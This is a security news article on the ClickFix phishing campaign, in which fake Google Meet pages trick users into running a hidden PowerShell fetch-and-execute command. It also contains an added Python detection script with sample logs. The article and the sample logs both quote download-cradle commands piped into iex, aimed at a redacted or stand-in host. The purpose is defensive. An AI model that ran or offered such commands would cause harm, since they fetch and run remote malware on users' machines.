A new phishing campaign, dubbed “ClickFix,” is using fake Google Meet pages to trick users into copying and running malicious PowerShell commands. The attack leads to infections with dangerous information-stealing malware, including AsyncRAT, StealC, and Rhadamanthys. This method highlights a growing trend in cybercrime where attackers rely on human error rather than software vulnerabilities to gain access to systems.
How the Attack Works
According to security researchers at Sucuri, the attack begins with phishing emails disguised as Google Meet invitations. These emails link to fake domains like meet.google.us-join.com or meet.googie.com-join.us.
Once users click the link, they see a fake Google Meet interface that mimics real error messages, such as “Microphone Permission Denied.” The page looks legitimate and is designed to appear like a common tech problem.
When users click a fake “Try Fix” button, a JavaScript function silently copies a malicious PowerShell command to their clipboard. They are then instructed to open the Run dialog with Win+R, paste the command with Ctrl+V, and run it.
The copied command resembles this format:
powershell -w 1 iwr hxxp://[REDACTED]/1/XR.txt -UseBasicParsing|iex
This command launches PowerShell with a hidden window (-w 1), downloads a script from a compromised website with Invoke-WebRequest (iwr), and pipes it straight into Invoke-Expression (iex). The script is never written to disk as a file, which helps it avoid antivirus detection.
Malware Delivered
The downloaded file, often named XR.txt, contains heavily scrambled PowerShell code. This code uses techniques like XOR decoding and regular expressions to rebuild itself at runtime and run silently.
Victims may see a fake “Verification Complete” message, meant to reassure them while malicious code installs in the background.
The malware includes:
- AsyncRAT – for remote control of infected devices
- StealC and Rhadamanthys – to steal browser data, credentials, and more
- Atomic Stealer – targeting macOS users through fake disk image files
The malware typically hides in the user’s AppData directory and sets up hidden scripts for persistence using environment variables and batch files.
Why This Attack Is Dangerous
ClickFix bypasses traditional defenses because it relies on users taking manual steps, like running commands themselves. This allows it to avoid detection by tools like Google Safe Browsing or email filters.
Security researchers have linked this method to groups such as TA571, Slavic Nation Empire, and Scamquerteo. The campaign has been active since early 2024 and targets multiple industries.
How to Protect Against This Threat
To defend against ClickFix and similar attacks, experts recommend the following steps:
- Training: Educate employees that legitimate services will never ask them to run PowerShell commands from email instructions.
- Monitoring: Use Endpoint Detection and Response (EDR) tools to track PowerShell usage and detect unusual behavior.
- Web Filtering: Block known phishing domains and malicious websites using web application firewalls.
- Access Controls: Restrict access to scripting tools and enforce strong user permission policies.
- Regular Scans: Run updated antivirus and anti-malware tools regularly to catch infections early.
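The monitoring step above is the one that catches ClickFix after a user has already pasted the command. The following added example (written for this article, not code from Sucuri or any EDR vendor) shows the kind of detection logic an EDR or SIEM rule would apply to process-creation events. It assumes a simple constructed log format with parent=, image= and cmdline= fields; the host names, timestamps and URLs in the sample lines are made up. It looks for the traits of the command shown earlier (hidden window, a download cradle such as iwr, and a pipe into iex) and raises the severity when the parent process is explorer.exe, which is what spawns PowerShell when a command is typed into the Win+R Run dialog.

```python
import re
from dataclasses import dataclass, field

# Traits of the ClickFix one-liner described in the article. Each regex is
# case-insensitive because PowerShell itself is.
INDICATORS = {
    # "-w 1", "-w hidden", "-WindowStyle Hidden": hide the console window
    "hidden_window": re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+(?:1|h(?:idden)?)\b", re.I),
    # download cradles: iwr / Invoke-WebRequest / irm / Net.WebClient.DownloadString
    "download_cradle": re.compile(
        r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|net\.webclient)\b", re.I),
    # in-memory execution of whatever was downloaded
    "in_memory_exec": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "basic_parsing": re.compile(r"-usebasicparsing\b", re.I),
    # remote URL ending in a script-like extension (the article's XR.txt)
    "remote_script_url": re.compile(r"https?://\S+\.(?:txt|ps1)\b", re.I),
}

# Constructed process-creation log format (hypothetical, not a real product's schema).
LOG_RX = re.compile(r"parent=(?P<parent>\S+)\s+image=(?P<image>\S+)\s+cmdline=(?P<cmdline>.*)$")


@dataclass
class Finding:
    cmdline: str
    parent: str
    matched: list = field(default_factory=list)
    severity: str = "none"


def assess(cmdline: str, parent: str = "") -> Finding:
    """Score one PowerShell command line against the ClickFix indicators."""
    matched = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    finding = Finding(cmdline, parent, matched)
    cradle_to_iex = "download_cradle" in matched and "in_memory_exec" in matched
    if cradle_to_iex and parent.lower() == "explorer.exe":
        # Win+R launches are children of explorer.exe; a download cradle piped
        # into iex from that parent is the ClickFix pattern almost exactly.
        finding.severity = "high"
    elif cradle_to_iex:
        finding.severity = "medium"
    elif matched:
        finding.severity = "low"  # e.g. a plain Invoke-WebRequest to a file
    return finding


def parse_line(line: str):
    """Return (parent, image, cmdline) for a log line, or None if it does not parse."""
    m = LOG_RX.search(line)
    if not m:
        return None
    return m.group("parent"), m.group("image"), m.group("cmdline").strip()


def scan_log(lines) -> list:
    """Assess every PowerShell process-creation event in the given log lines."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        parent, image, cmdline = parsed
        if not any(p in image.lower() for p in ("powershell", "pwsh")):
            continue
        findings.append(assess(cmdline, parent))
    return findings


# Constructed sample events: one ClickFix-style launch, a scheduled backup script,
# a benign file download, a second cradle variant, and an unrelated process.
SAMPLE_LOG = [
    "2024-10-17T10:21:05Z host=WS01 parent=explorer.exe image=powershell.exe "
    "cmdline=powershell -w 1 iwr http://compromised-site.invalid/1/XR.txt -UseBasicParsing|iex",
    "2024-10-17T10:22:40Z host=WS01 parent=cmd.exe image=powershell.exe "
    "cmdline=powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "2024-10-17T10:25:13Z host=WS02 parent=cmd.exe image=powershell.exe "
    "cmdline=powershell Invoke-WebRequest https://intranet.example.invalid/report.csv -OutFile r.csv",
    "2024-10-17T10:31:58Z host=WS03 parent=explorer.exe image=powershell.exe "
    "cmdline=powershell -WindowStyle Hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://compromised-site.invalid/stage2.ps1')\"",
    "2024-10-17T10:33:02Z host=WS03 parent=svchost.exe image=svchost.exe cmdline=svchost.exe -k netsvcs",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.severity:6s} parent={f.parent:13s} {', '.join(f.matched) or '-'}")
```

The severity tiers matter in practice: a bare Invoke-WebRequest is common in administrative scripts and should only add context, whereas a download piped into iex from an explorer.exe parent is rare enough in normal use to justify an alert and a clipboard/Run-dialog investigation on that host.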
Preventing attacks like ClickFix requires a layered approach—combining technology with human awareness to reduce the risk of compromise.